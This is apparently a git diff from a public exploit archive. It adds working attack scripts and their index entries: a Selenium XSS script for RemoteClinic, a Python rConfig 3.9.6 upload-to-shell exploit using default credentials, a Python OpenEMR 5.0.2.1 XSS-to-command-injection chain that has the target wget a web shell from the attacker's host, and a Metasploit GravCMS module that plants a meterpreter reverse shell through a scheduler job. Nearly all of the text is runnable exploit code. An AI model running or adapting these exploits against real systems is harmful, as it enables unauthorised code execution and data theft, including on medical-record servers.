+browser.execute_script("document.querySelector('[name=\"contact\"]').value += '123456789'") +browser.execute_script("document.querySelector('[name=\"mobile\"]').value = +'12345678910'") +browser.execute_script("document.querySelector('[name=\"skype\"]').value = +'nu11secur1ty'") +browser.execute_script("document.querySelector('[name=\"address\"]').value += 'Kurec A 31'") +browser.find_element_by_name('image').send_keys("C:\\Users\\nu11secur1ty\\Desktop\\CVE\\CVE-2021-30044\\nu11secur1ty.png") +time.sleep(5) + +# Submit exploit +signInButton = browser.find_element_by_name(element_for_natrutvanie) +signInButton.click() + +# Maani sa i testwai posle +time.sleep(1) +browser.get(("http://localhost/RemoteClinic/login/signout.php")) +browser.close() + + +print("payload is deployed...\n") +except Exception: + +#### This exception occurs if the element are not found in the webpage. +print("Some error occured :(") \ No newline at end of file diff --git a/exploits/php/webapps/49783.py b/exploits/php/webapps/49783.py new file mode 100755 index 000000000..107c7dfa6 --- /dev/null +++ b/exploits/php/webapps/49783.py @@ -0,0 +1,44 @@ +# Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2) +# Exploit Author: Vishwaraj Bhattrai +# Date: 18/04/2021 +# Vendor Homepage: https://www.rconfig.com/ +# Software Link: https://www.rconfig.com/ +# Vendor: rConfig +# Version: <= v3.9.6 +# Tested against Server Host: Linux+XAMPP + +import requests +import sys +s = requests.Session() + +host=sys.argv[1] #Enter the hostname +cmd=sys.argv[2] #Enter the command + +def exec_cmd(cmd,host): + print "[+]Executing command" + path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd) + response=requests.get(path) + print response.text + print "\n[+]You can access shell via below path" + print path + +def file_upload(cmd,host): + print "[+]Bypassing file upload" + burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php" + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"} + burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""} + burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n" + requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data) + exec_cmd(cmd,host) + + +def login(host,cmd): + print "[+]Logging in" + burp0_url = "https://"+host+":443/lib/crud/userprocess.php" + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} + + burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin + response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data) + file_upload(cmd,host) + +login(host,cmd) \ No newline at end of file diff --git a/exploits/php/webapps/49784.py b/exploits/php/webapps/49784.py new file mode 100755 index 000000000..72c2af83a --- /dev/null +++ b/exploits/php/webapps/49784.py @@ -0,0 +1,212 @@ +# Exploit Title: OpenEMR 5.0.2.1 - Remote Code Execution +# Exploit Author: Hato0, BvThTrd +# Date: 2020-08-07 +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.2.1/openemr-5.0.2.tar.gz/download +# Version: 5.0.2.1 (without patches) +# Tested on: Ubuntu Server 20.04.1 LTS, OpenEMR Version 5.0.2.1 +# References: +# https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability?utm_medium=cpc&utm_source=twitter&utm_campaign=openemr&utm_term=security&utm_content=tofu +# https://www.youtube.com/watch?v=H8VWNwWgYJo&feature=emb_logo + +#!/usr/bin/python3 + +WARNING=''' + + +===================================== WARNING ===================================== + Please do not use for illegal purposes. It's for educational use only. + Please be on the good side. +=================================================================================== + + +''' + +import argparse +import http.server +import socketserver +import requests +from termcolor import colored +import json + +OPENEMR_DIR = "" +RHOST = "127.0.0.1" +RPORT = 80 +VHOST = "" +LHOST = "127.0.0.1" +LPORT = 4444 +WPORT = 8080 + +def main(): + print(colored(WARNING, "red")) + arguments() + cookie1, cookie2 = init_session() + jsonReceived, id = get_api(cookie1["OpenEMR"], cookie2["PortalOpenEMR"]) + write_payload_js() + write_wshell() + send_xss(id,cookie1["OpenEMR"], cookie2["PortalOpenEMR"], jsonReceived) + if len(VHOST) > 0 : + print(colored("[+]", "green"),f'Your wshell is available at http://{VHOST}/{OPENEMR_DIR}interface/main/wshell.php?cmd=') + else: + print(colored("[+]", "green"),f'Your wshell is available at http://{RHOST}:{RPORT}/{OPENEMR_DIR}interface/main/wshell.php?cmd=') + web_serv() + +def arguments(): + parser = argparse.ArgumentParser(description='This exploit drop a web shell on an OpenEMR v5.0.2.1 CMS. At the end, GET the URL and run a netcat listener on the LHOST:LHPORT. You will be able to do a Remote Code Execution on this server.') + parser.add_argument("-d", "--directory", dest='directory', nargs='?', help="Root directory OpenEMR CMS") + parser.add_argument("-rh", "--rhost", dest='rhost', help="Remote server IP", required=True) + parser.add_argument("-rp", "--rport", dest='rport', nargs='?', help="Remote server PORT", type=int) + parser.add_argument("-vh", "--vhost", dest='vhost', nargs='?', help="Remote server DOMAIN_NAME") + parser.add_argument("-lh", "--lhost", dest='lhost', help="Reverse shell IP", required=True) + parser.add_argument("-lp", "--lport", dest='lport', help="Reverse shell PORT", type=int, required=True) + parser.add_argument("-wp", "--wport", dest='wport', nargs='?', help="Web Server PORT", type=int) + + args = parser.parse_args() + + if(args.directory != None): + global OPENEMR_DIR + OPENEMR_DIR = str(args.directory) + if OPENEMR_DIR[-1] != "/": + OPENEMR_DIR += "/" + if(args.rhost != None): + global RHOST + RHOST = str(args.rhost) + if(args.rport != None): + global RPORT + RPORT = int(args.rport) + if(args.vhost != None): + global VHOST + VHOST = str(args.vhost) + if(args.lhost != None): + global LHOST + LHOST = str(args.lhost) + if(args.lport != None): + global LPORT + LPORT = int(args.lport) + if(args.wport != None): + global WPORT + WPORT = int(args.wport) + +def init_session(): + r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}interface/login/login.php?site=default', headers={'host': VHOST}) + + if (r.status_code != 200): + print(colored("[-]", "red"),f'An error occured : {r.status_code} ==>\n{r.text}') + exit(1) + else: + print(colored("[+]", "green"),f'Successfully set Session_Regsiter=true with cookie OpenEMR:{r.cookies["OpenEMR"]}') + + cookies = {"OpenEMR" : r.cookies["OpenEMR"]} + r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/account/register.php', headers={'host': VHOST}, cookies=cookies) + + if (r.status_code != 200): + print(colored("[-]", "red"),f'An error occured : {r.status_code} ==>\n{r.text}') + exit(1) + else: + print(colored("[+]", "green"),f'Successfully set Session_Regsiter=true with cookie PortalOpenEMR:{r.cookies["PortalOpenEMR"]}') + + + cookies2 = {"PortalOpenEMR": r.cookies["PortalOpenEMR"]} + return (cookies, cookies2) + + +def get_api(cookieEMR, cookiePortal): + cookies = {"OpenEMR" : cookieEMR, "PortalOpenEMR": cookiePortal} + + r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/patient/api/users/', headers={'host': VHOST}, cookies=cookies) + + parsed_json = (json.loads(r.text)) + for row in parsed_json['rows']: + if row['authorized'] == str(1): + print(colored("[+]", "green"),f'Find admin :') + print(colored('\t[*]', 'yellow'), f'Id = {row["id"]}') + print(colored('\t[*]', 'yellow'), f'Username = {row["username"]}') + print(colored('\t[*]', 'yellow'), f'lname = {row["lname"]}') + print(colored('\t[*]', 'yellow'), f'fname = {row["fname"]}') + id = row['id'] + json_to_return = row + if (r.status_code != 200): + print(colored("[-]", "red"),f'An error occured : {r.status_code} ==>\n{r.text}') + exit(1) + else: + return (json_to_return, id) + + +def write_payload_js(): + payload = "var xmlHttp = new XMLHttpRequest();\n" + payload += "var token = window.location.href;\n" + if len(VHOST) > 0 : + payload += "var mainUrl = 'http://{0}/{1}interface/main/tabs/main.php?token_main=';\n".format(VHOST, OPENEMR_DIR) + payload += "var backUrl = 'http://{0}/{1}interface/main/backup.php';\n".format(VHOST,OPENEMR_DIR) + else: + payload += "var mainUrl = 'http://{0}:{1}/{2}interface/main/tabs/main.php?token_main=';\n".format(RHOST, RPORT, OPENEMR_DIR) + payload += "var backUrl = 'http://{0}:{1}/{2}interface/main/backup.php';\n".format(RHOST, RPORT, OPENEMR_DIR) + payload += "var cookieSet = 'OpenEMR=';\n\n" + + payload += "token = token.split('=')[1];\n\n" + + payload += "xmlHttp.open( 'GET', backUrl, false );\n" + payload += "xmlHttp.send(null);\n\n" + + payload += "var response = xmlHttp.responseText;\n" + payload += "var elemHTML = response.split(' ');\n" + payload += "var csrf = '';\n\n\n" + + + payload += "for(var i=0; i < elemHTML.length; i++)\n" + payload += "{\n" + payload += "\t if(elemHTML[i] == 'name=\"csrf_token_form\"')\n" + payload += "\t {\n" + payload += "\t\t csrf = elemHTML[i+1].split('=')[1].replace(/\"/g,'');\n" + payload += "\t\t break;\n" + payload += "\t }\n" + payload += "}\n\n\n" + + + payload += "var formData = new FormData();\n\n" + + payload += "formData.append('csrf_token_form', csrf);\n" + payload += "formData.append('form_sel_lists[]', 'amendment_status');\n" + payload += "formData.append('form_sel_layouts[]', '`wget http://{0}:{1}/wshell.php -O wshell.php;`');\n".format(LHOST,WPORT) + payload += "formData.append('form_step', '102');\n" + payload += "formData.append('form_status', '');\n\n" + + payload += "var request = new XMLHttpRequest();\n" + payload += "request.open('POST', backUrl);\n" + payload += "request.send(formData);\n" + + with open('payload.js','w') as fpayload: + for line in payload: + fpayload.write(line) + fpayload.close() + print(colored("[+]", "green"),f'Payload XSS written') + + +def write_wshell(): + with open('wshell.php','w') as fwshell: + fwshell.write("\n") + fwshell.close() + print(colored("[+]", "green"),f'Wshell written') + + +def send_xss(id, cookieEMR, cookiePortal, jsonData): + cookies = {"OpenEMR" : cookieEMR, "PortalOpenEMR": cookiePortal} + jsonData["lname"] = "".format(LHOST,WPORT) + jsonData["cpoe"] = 1 + jsonData["source"] = 1 + jsonData.pop("id",None) + data = json.dumps(jsonData, indent = 4) + r = requests.put(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/patient/api/user/{id}', headers={'host': VHOST}, cookies=cookies, data=data) + print(colored("[+]", "green"),f'Stored XSS dropped') + + +def web_serv(): + Handler = http.server.SimpleHTTPRequestHandler + + with socketserver.TCPServer(("", WPORT), Handler) as httpd: + print(colored("[+]", "green"),f'HTTP Simple Server running at localhost PORT {WPORT}') + httpd.serve_forever() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/49788.rb b/exploits/php/webapps/49788.rb new file mode 100755 index 000000000..1082d237e --- /dev/null +++ b/exploits/php/webapps/49788.rb @@ -0,0 +1,160 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'GravCMS Remote Command Execution', + 'Description' => %q{ + This module exploits arbitrary config write/update vulnerability to achieve remote code execution. + Unauthenticated users can execute a terminal command under the context of the web server user. + + Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. + In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without + needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of + existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes, + such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability, + an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command + under the context of the web-server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['CVE', '2021-21425'], + ['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/'] + ], + 'Privileged' => true, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'DefaultOptions' => + { + 'payload' => 'php/meterpreter/reverse_tcp', + 'Encoder' => 'php/base64', + 'WfsDelay' => 90 + }, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => '2021-03-29', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ + CONFIG_CHANGES # user/config/scheduler.yaml + ] + } + ) + ) + + end + + def check + # During the fix, developers changed admin-nonce to login-nonce. + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'admin') + ) + + if res && !res.get_hidden_inputs.first['admin-nonce'].nil? + CheckCode::Appears + else + CheckCode::Safe + end + end + + def capture_cookie_token + print_status 'Sending request to the admin path to generate cookie and token' + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'admin') + ) + + # Cookie must contain grav-site-az09-admin and admin-nonce form field must contain value + if res && res.get_cookies =~ /grav-site-[a-z0-9]+-admin=(\S*);/ && !res.get_hidden_inputs.first['admin-nonce'].nil? + print_good 'Cookie and CSRF token successfully extracted !' + else + fail_with Failure::UnexpectedReply, 'The server sent a response, but cookie and token was not found.' + end + + @cookie = res.get_cookies + @admin_nonce = res.get_hidden_inputs.first['admin-nonce'] + + end + + def exploit + + unless check == CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable.' + end + + capture_cookie_token + + @task_name = Rex::Text.rand_text_alpha_lower(5) + + # Msf PHP payload does not contain quotes for many good reasons. But a single quote will surround PHP binary's + # parameter due to the command execution library of the GravCMS. For that reason, surrounding base64 part of the + # payload with a double quote is necessary to command executed successfully. + + payload.encoded.sub! 'base64_decode(', 'base64_decode("' + payload.encoded.sub! '));', '"));' + + print_status 'Implanting payload via scheduler feature' + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'), + 'cookie' => @cookie, + 'vars_post' => { + 'admin-nonce' => @admin_nonce, + 'task' => 'SaveDefault', + "data[custom_jobs][#{@task_name}][command]" => '/usr/bin/php', + "data[custom_jobs][#{@task_name}][args]" => "-r #{payload.encoded}", + "data[custom_jobs][#{@task_name}][at]" => '* * * * *', + "data[custom_jobs][#{@task_name}][output]" => '', + "data[status][#{@task_name}]" => 'enabled', + "data[custom_jobs][#{@task_name}][output_mode]" => 'append' + } + ) + + if res && res.code == 200 && res.body.include?('Successfully saved') + print_good 'Scheduler successfully created ! Wait for 1 minute...' + end + + end + + def on_new_session + print_status 'Cleaning up the the scheduler...' + + # Thanks to the YAML update method, we can remove the command details from the config file just by re-enabling + # the scheduler without any parameter:) It will leave the only command name in the config file. + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'), + 'cookie' => @cookie, + 'vars_post' => { + 'admin-nonce' => @admin_nonce, + 'task' => 'SaveDefault', + "data[status][#{@task_name}]" => 'enabled' + } + ) + + if res && res.code == 200 && res.body.include?('Successfully saved') + print_good 'The scheduler config successfully cleaned up!' + end + + end + +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b93baa728..5f067be90 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6778,6 +6778,7 @@ id,file,description,date,author,type,platform,port 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple, 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware, 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple, +49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -18442,6 +18443,7 @@ id,file,description,date,author,type,platform,port 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple, 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux, 49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix, +49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43906,7 +43908,7 @@ id,file,description,date,author,type,platform,port 49712,exploits/php/webapps/49712.html,"GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS",2021-03-26,"Abhishek Joshi",webapps,php, 49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",2021-03-26,"George Tsimpidas",webapps,php, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php, -49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php, +49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",2021-03-18,"Murat ŞEKER",webapps,php, 49718,exploits/php/webapps/49718.txt,"WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)",2021-03-29,m0ze,webapps,php, 49720,exploits/hardware/webapps/49720.txt,"TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)",2021-03-29,"Smriti Gaba",webapps,hardware, 49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",2021-03-29,"Quadron Research Lab",webapps,php, @@ -43949,3 +43951,17 @@ id,file,description,date,author,type,platform,port 49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",2021-04-15,"Akash Chathoth",webapps,multiple, 49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple, 49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE",2021-04-16,boku,webapps,php, +49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",2021-04-21,"Rodolfo Mariano",webapps,hardware, +49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",2021-04-21,"Fatih Coskun",webapps,php, +49778,exploits/php/webapps/49778.txt,"WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS)",2021-04-21,"Himamshu Dilip Kulkarni",webapps,php, +49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-21,"Ömer Hasan Durmuş",webapps,php, +49780,exploits/multiple/webapps/49780.py,"Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass",2021-04-21,Mesh3l_911,webapps,multiple, +49781,exploits/php/webapps/49781.py,"RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-21,nu11secur1ty,webapps,php, +49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)",2021-04-21,"Vishwaraj Bhattrai",webapps,php, +49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",2021-04-21,Hato0,webapps,php, +49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",2021-04-21,3ndG4me,webapps,hardware, +49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-04-21,3ndG4me,webapps,hardware, +49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",2021-04-21,3ndG4me,webapps,hardware, +49788,exploits/php/webapps/49788.rb,"GravCMS 1.10.7 - Unauthenticated Arbitrary YAML Write/Update (Metasploit)",2021-04-21,"Mehmet Ince",webapps,php, +49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",2021-04-21,"Dolev Farhi",webapps,multiple, +49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",2021-04-21,"Dolev Farhi",webapps,multiple,